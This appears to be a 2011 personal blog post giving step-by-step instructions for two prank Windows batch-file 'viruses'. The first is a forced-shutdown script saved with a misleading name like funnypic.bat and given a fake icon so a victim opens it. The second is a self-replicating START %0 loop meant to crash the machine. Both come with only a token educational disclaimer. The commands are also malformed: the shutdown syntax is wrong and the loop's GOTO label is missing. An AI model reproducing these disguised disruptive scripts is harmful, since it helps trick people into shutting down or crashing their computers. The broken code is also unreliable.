
Saturday, 17 December 2011

How to make a simple virus

Make a virus that shutdown your computer (actually it is not a virus its a bat file)

1. Open notepad.
2. Type this "Shutdown -s -+5"
3. Now save it as "yourfilename.bat" for exmaple funnypic.bat (note that .bat is necessary)
4. Now make it something realistic.
5. Right click on your save file and create shortcut.
6. Right click on your shortcut file and go into properties.
7. Under the shortcut tab click on change icon and change to any icon.

Note this is only for educational purpose. Don't use it to harm anyone.

Make a never ending virus. 
Warning it may cause your computer to crash, save all data before using

1. Open notepad.
2. Type this into notepad
                 START %0
                 GOTO :C
3. Follow all the above steps.


Type "Start virus.bat" and save it with "virus.bat" name 

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